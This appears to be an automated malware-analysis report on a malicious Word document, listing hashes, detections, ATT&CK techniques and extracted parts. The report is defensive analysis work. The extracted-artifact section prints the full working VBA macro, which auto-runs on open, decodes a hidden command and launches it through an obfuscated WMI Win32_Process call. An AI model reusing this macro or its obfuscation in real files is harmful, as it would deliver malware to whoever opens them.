Office (OOXML) malware analysis — malicious · 4b02c505d2a5ca81

MALICIOUS

Office (OOXML)

28.8 KB Created: 2020-08-05 22:33:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-09-07

MD5: 87e70cd60130955ba6d7155d715d3072 SHA-1: 3c7f4d864a96eaa1a9e8b2179c74a159c3d90aea SHA-256: 4b02c505d2a5ca813739d155588882c2db8934fd1586a6fa3f3d867acb0dcb51

422 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File: User Execution

The sample is a malicious OOXML document containing a VBA macro that automatically executes upon opening. The macro uses WMI (Win32_Process) to create a new process, indicating it's designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Downloader.Sagent-9376492-0' further supports its role as a downloader.

Heuristics 10

ClamAV: Doc.Downloader.Sagent-9376492-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Sagent-9376492-0
VBA project inside OOXML medium 5 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded OLE object medium OOXML_OLE_OBJECT

Document contains an embedded OLE object
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 4

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	3451 bytes
SHA-256: `1217002a4d490c59503602dd3c36d737111e0b5718492e754593374bf2ac64f0`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit Private Sub TenTier(ByVal Multinuclear As String) Dim Crossfire As Long: Dim Skimmia() As Byte GoTo InopportunIty Agentive: Subreligion StrConv(Skimmia, 64, 1055) Exit Sub NarcomaNia: For Crossfire = 0 To UBound(Skimmia) Skimmia(Crossfire) = Abs(Skimmia(Crossfire) - 5) Next GoTo Agentive Exit Sub InopportunIty: Skimmia = StrConv(Multinuclear, 128, 1055) GoTo NarcomaNia Exit Sub End Sub Sub Document_Open() Call Heraklion End Sub Private Sub Heraklion() Dim Multinuclear As String: Multinuclear = ActiveDocument.Variables("d35b8465148").Value TenTier Multinuclear End Sub Private Sub Subreligion(ByVal Tubercularised As String) Dim Harassed As String: Harassed = "." If Tubercularised <> "" Then GetObject("w" & "i" & "n" & "m" & "gm" & "t" & "s" & ":\\" & Harassed & "\ro" & "ot\ci" & "m" & "v2" & ":W" & "in3" & "2_P" & "r" & "oc" & "e" & "s" & "s").Create Tubercularised, Null, Null, 0 Else MsgBox "Promted usr764 ." GetObject("wi" & "n" & "m" & "g" & "mt" & "s:\\" & "." & "\ro" & "ot\ci" & "mv2" & ":W" & "in" & "3" & "2" & "_P" & "roc" & "e" & "ss").Create "calc.exe", Null, Null, 0 End If End Sub
`ooxml_oleobject_00.bin`	ooxml-ole-object	OOXML embedded OLE part: word/embeddings/Microsoft_Word_Document.docx	11387 bytes
SHA-256: `c94dda14ccb19cf7a6015689551886c4c2d027d5d596484c03bc6c00129e15e4`
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	13824 bytes
SHA-256: `7030ec064d8b1a823b5f82c59830a4eb06748de8f3eeafd1a448321464293e2c`
Detection ClamAV: Doc.Downloader.Sagent-9376492-0 Obfuscation or payload: unlikely
`emf_00.emf`	ooxml-emf	OOXML EMF part: word/media/image1.emf	936 bytes
SHA-256: `d052055bed4137a2f1b55d59285ea8236c02a3f3cb31ffb889d5d9cfc86f5802`

Open this report in the interactive analyzer, or submit your own file for analysis.